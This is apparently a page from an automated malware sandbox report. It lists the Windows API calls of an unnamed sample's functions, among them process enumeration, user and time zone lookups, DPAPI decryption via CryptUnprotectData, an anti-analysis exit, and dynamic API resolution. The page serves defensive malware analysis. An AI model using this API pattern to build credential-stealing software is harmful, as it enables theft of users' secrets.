Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 018879b292b816f3aa3a1dad4d200cc2d6a3a3a2570d4ec63ad81a3edc3de778
Instruction ID: 92de1f8ba9523055a40bdc1c4033d087b780ebf467ebe43ece16487fd614e6fc
Opcode Fuzzy Hash: 018879b292b816f3aa3a1dad4d200cc2d6a3a3a2570d4ec63ad81a3edc3de778
Instruction Fuzzy Hash: 8C1212719101199ADB14FB70DCAAEED7B38BF94301F40469AB90A56091FE346F4DCF92

Function 00559600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0055961E
Process32First.KERNEL32(00560ACA,00000128), ref: 00559632
Process32Next.KERNEL32(00560ACA,00000128), ref: 00559647
StrCmpCA.SHLWAPI(?,00000000), ref: 0055965C
CloseHandle.KERNEL32(00560ACA), ref: 0055967A

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
Instruction ID: 30f10f6d7647c54cd76cc577cf2f5a09c0627176ebb3f7460e8ff16ccef10938
Opcode Fuzzy Hash: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
Instruction Fuzzy Hash: 56011E75A40208FBDB15DFA5DD58BEDBBF8FB48301F10819AA90697240D738AB48DF51

Function 00557A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0127D9E8,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557A63
RtlAllocateHeap.NTDLL(00000000), ref: 00557A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0127D9E8,00000000,?,00560E10,00000000,?,00000000,00000000,?), ref: 00557A7D
wsprintfA.USER32 ref: 00557AB7

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
Instruction ID: 745be23eac5a31053389751bde1a19abe734283e5445a4c9f54f1fc9edd83371
Opcode Fuzzy Hash: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
Instruction Fuzzy Hash: 4B11A1B1A45218EBEB20CF54DC59FAABB78FB04721F10479AEA0A932C0D7781E44CF51

Function 00549B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
LocalFree.KERNEL32(?), ref: 00549BD3

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 61369541039d934faca4203235b88aada599dcead96bffecad8cbfd901b69fad
Instruction ID: b0f0f6c343b64e601c08dfc5f629fa25c6d5f2ee99e1f1e782ef5b259224a105
Opcode Fuzzy Hash: 61369541039d934faca4203235b88aada599dcead96bffecad8cbfd901b69fad
Instruction Fuzzy Hash: 2A11C9B8A00209EFDB04DF94D985EAEB7B5FF88304F1085A9E915A7350D774AE10CFA1

Function 00557850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
RtlAllocateHeap.NTDLL(00000000), ref: 00557887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
Instruction ID: 2c4d2b98053619506c1266ad9c209b0f1d8a9943a6f3c67b784837e2a1d16652
Opcode Fuzzy Hash: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
Instruction Fuzzy Hash: 0BF04FB2944208ABDB10DF98DD49BAEBBB8FB08721F10465AFA05A2680C77815048BA1

Function 00541160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0054116A
ExitProcess.KERNEL32 ref: 0054117E

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
Instruction ID: 866bd86557b26f156826fc20dd0e5d3d36d6d3039ae17df4f0d0e268f7677cd0
Opcode Fuzzy Hash: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
Instruction Fuzzy Hash: 02D05E7494030CEBDB00DFE0D8496DDBB78FB08315F101555D90562340EA345481CBAA

Function 00559C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01266980), ref: 00559C2D
GetProcAddress.KERNEL32(75900000,012669A0), ref: 00559C45
GetProcAddress.KERNEL32(75900000,01278F28), ref: 00559C5E
GetProcAddress.KERNEL32(75900000,01278F58), ref: 00559C76
GetProcAddress.KERNEL32(75900000,0127CC60), ref: 00559C8E
GetProcAddress.KERNEL32(75900000,0127CD68), ref: 00559CA7
GetProcAddress.KERNEL32(75900000,0126B4C8), ref: 00559CBF
GetProcAddress.KERNEL32(75900000,0127CD80), ref: 00559CD7
GetProcAddress.KERNEL32(75900000,0127CDE0), ref: 00559CF0
GetProcAddress.KERNEL32(75900000,0127CBA0), ref: 00559D08
GetProcAddress.KERNEL32(75900000,0127CC00), ref: 00559D20
GetProcAddress.KERNEL32(75900000,012667E0), ref: 00559D39
GetProcAddress.KERNEL32(75900000,012669C0), ref: 00559D51
GetProcAddress.KERNEL32(75900000,012669E0), ref: 00559D69
GetProcAddress.KERNEL32(75900000,01266A00), ref: 00559D82
GetProcAddress.KERNEL32(75900000,0127CC30), ref: 00559D9A
GetProcAddress.KERNEL32(75900000,0127CC48), ref: 00559DB2
GetProcAddress.KERNEL32(75900000,0126B4F0), ref: 00559DCB
GetProcAddress.KERNEL32(75900000,01266680), ref: 00559DE3
GetProcAddress.KERNEL32(75900000,0127CB58), ref: 00559DFB
GetProcAddress.KERNEL32(75900000,0127CDF8), ref: 00559E14
GetProcAddress.KERNEL32(75900000,0127CC78), ref: 00559E2C
GetProcAddress.KERNEL32(75900000,0127CC18), ref: 00559E44
GetProcAddress.KERNEL32(75900000,012666A0), ref: 00559E5D
GetProcAddress.KERNEL32(75900000,0127CBB8), ref: 00559E75
GetProcAddress.KERNEL32(75900000,0127CCD8), ref: 00559E8D
GetProcAddress.KERNEL32(75900000,0127CB70), ref: 00559EA6
GetProcAddress.KERNEL32(75900000,0127CD98), ref: 00559EBE
GetProcAddress.KERNEL32(75900000,0127CB40), ref: 00559ED6
GetProcAddress.KERNEL32(75900000,0127CDB0), ref: 00559EEF
GetProcAddress.KERNEL32(75900000,0127CC90), ref: 00559F07
GetProcAddress.KERNEL32(75900000,0127CCA8), ref: 00559F1F
GetProcAddress.KERNEL32(75900000,0127CCC0), ref: 00559F38
GetProcAddress.KERNEL32(75900000,01279E18), ref: 00559F50
GetProcAddress.KERNEL32(75900000,0127CCF0), ref: 00559F68
GetProcAddress.KERNEL32(75900000,0127CD08), ref: 00559F81
GetProcAddress.KERNEL32(75900000,012666C0), ref: 00559F99
GetProcAddress.KERNEL32(75900000,0127CD38), ref: 00559FB1
GetProcAddress.KERNEL32(75900000,01266700), ref: 00559FCA
GetProcAddress.KERNEL32(75900000,0127CD20), ref: 00559FE2
GetProcAddress.KERNEL32(75900000,0127CDC8), ref: 00559FFA
GetProcAddress.KERNEL32(75900000,012663C0), ref: 0055A013
GetProcAddress.KERNEL32(75900000,012665C0), ref: 0055A02B
LoadLibraryA.KERNEL32(0127CB10,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A03D
LoadLibraryA.KERNEL32(0127CBD0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A04E
LoadLibraryA.KERNEL32(0127CD50,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A060
LoadLibraryA.KERNEL32(0127CBE8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A072
LoadLibraryA.KERNEL32(0127CB28,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A083
LoadLibraryA.KERNEL32(0127CB88,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A095
LoadLibraryA.KERNEL32(0127CF78,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0A7
LoadLibraryA.KERNEL32(0127CE28,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0B8
GetProcAddress.KERNEL32(75FD0000,012664A0), ref: 0055A0DA
GetProcAddress.KERNEL32(75FD0000,0127CE58), ref: 0055A0F2
GetProcAddress.KERNEL32(75FD0000,01278AE0), ref: 0055A10A
GetProcAddress.KERNEL32(75FD0000,0127CFA8), ref: 0055A123
GetProcAddress.KERNEL32(75FD0000,012663E0), ref: 0055A13B
GetProcAddress.KERNEL32(6FDC0000,0126B0E0), ref: 0055A160
GetProcAddress.KERNEL32(6FDC0000,012665E0), ref: 0055A179
GetProcAddress.KERNEL32(6FDC0000,0126B068), ref: 0055A191
GetProcAddress.KERNEL32(6FDC0000,0127CFC0), ref: 0055A1A9
GetProcAddress.KERNEL32(6FDC0000,0127CF30), ref: 0055A1C2
GetProcAddress.KERNEL32(6FDC0000,01266360), ref: 0055A1DA
GetProcAddress.KERNEL32(6FDC0000,012665A0), ref: 0055A1F2
GetProcAddress.KERNEL32(6FDC0000,0127CEB8), ref: 0055A20B
GetProcAddress.KERNEL32(763B0000,012662E0), ref: 0055A22C
GetProcAddress.KERNEL32(763B0000,012663A0), ref: 0055A244
GetProcAddress.KERNEL32(763B0000,0127CED0), ref: 0055A25D
GetProcAddress.KERNEL32(763B0000,0127CF48), ref: 0055A275
GetProcAddress.KERNEL32(763B0000,01266380), ref: 0055A28D
GetProcAddress.KERNEL32(750F0000,0126AFA0), ref: 0055A2B3
GetProcAddress.KERNEL32(750F0000,0126B180), ref: 0055A2CB
GetProcAddress.KERNEL32(750F0000,0127CF90), ref: 0055A2E3
GetProcAddress.KERNEL32(750F0000,01266540), ref: 0055A2FC
GetProcAddress.KERNEL32(750F0000,01266400), ref: 0055A314
GetProcAddress.KERNEL32(750F0000,0126B220), ref: 0055A32C
GetProcAddress.KERNEL32(75A50000,0127CE10), ref: 0055A352
GetProcAddress.KERNEL32(75A50000,01266580), ref: 0055A36A
GetProcAddress.KERNEL32(75A50000,01278B50), ref: 0055A382
GetProcAddress.KERNEL32(75A50000,0127CEE8), ref: 0055A39B
GetProcAddress.KERNEL32(75A50000,0127CF00), ref: 0055A3B3
GetProcAddress.KERNEL32(75A50000,01266620), ref: 0055A3CB
GetProcAddress.KERNEL32(75A50000,01266460), ref: 0055A3E4
GetProcAddress.KERNEL32(75A50000,0127CF60), ref: 0055A3FC
GetProcAddress.KERNEL32(75A50000,0127CE40), ref: 0055A414
GetProcAddress.KERNEL32(75070000,01266420), ref: 0055A436
GetProcAddress.KERNEL32(75070000,0127CF18), ref: 0055A44E
GetProcAddress.KERNEL32(75070000,0127CE70), ref: 0055A466
GetProcAddress.KERNEL32(75070000,0127CE88), ref: 0055A47F
GetProcAddress.KERNEL32(75070000,0127CEA0), ref: 0055A497
GetProcAddress.KERNEL32(74E50000,01266300), ref: 0055A4B8
GetProcAddress.KERNEL32(74E50000,01266440), ref: 0055A4D1
GetProcAddress.KERNEL32(75320000,012662A0), ref: 0055A4F2
GetProcAddress.KERNEL32(75320000,0127CA50), ref: 0055A50A
GetProcAddress.KERNEL32(6F2A0000,012662C0), ref: 0055A530
GetProcAddress.KERNEL32(6F2A0000,01266480), ref: 0055A548
GetProcAddress.KERNEL32(6F2A0000,01266600), ref: 0055A560
GetProcAddress.KERNEL32(6F2A0000,0127C888), ref: 0055A579
GetProcAddress.KERNEL32(6F2A0000,012664C0), ref: 0055A591
GetProcAddress.KERNEL32(6F2A0000,012664E0), ref: 0055A5A9
GetProcAddress.KERNEL32(6F2A0000,01266500), ref: 0055A5C2
GetProcAddress.KERNEL32(6F2A0000,01266520), ref: 0055A5DA
GetProcAddress.KERNEL32(6F2A0000,InternetSetOptionA), ref: 0055A5F1
GetProcAddress.KERNEL32(6F2A0000,HttpQueryInfoA), ref: 0055A607
GetProcAddress.KERNEL32(74E00000,0127CA98), ref: 0055A629
GetProcAddress.KERNEL32(74E00000,01278A10), ref: 0055A641
GetProcAddress.KERNEL32(74E00000,0127C930), ref: 0055A659
GetProcAddress.KERNEL32(74E00000,0127CA80), ref: 0055A672
GetProcAddress.KERNEL32(74DF0000,01266560), ref: 0055A693
GetProcAddress.KERNEL32(6E610000,0127C9D8), ref: 0055A6B4
GetProcAddress.KERNEL32(6E610000,01266280), ref: 0055A6CD
GetProcAddress.KERNEL32(6E610000,0127CAB0), ref: 0055A6E5
GetProcAddress.KERNEL32(6E610000,0127CAC8), ref: 0055A6FD

Strings

HttpQueryInfoA, xrefs: 0055A5FC
InternetSetOptionA, xrefs: 0055A5E5

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

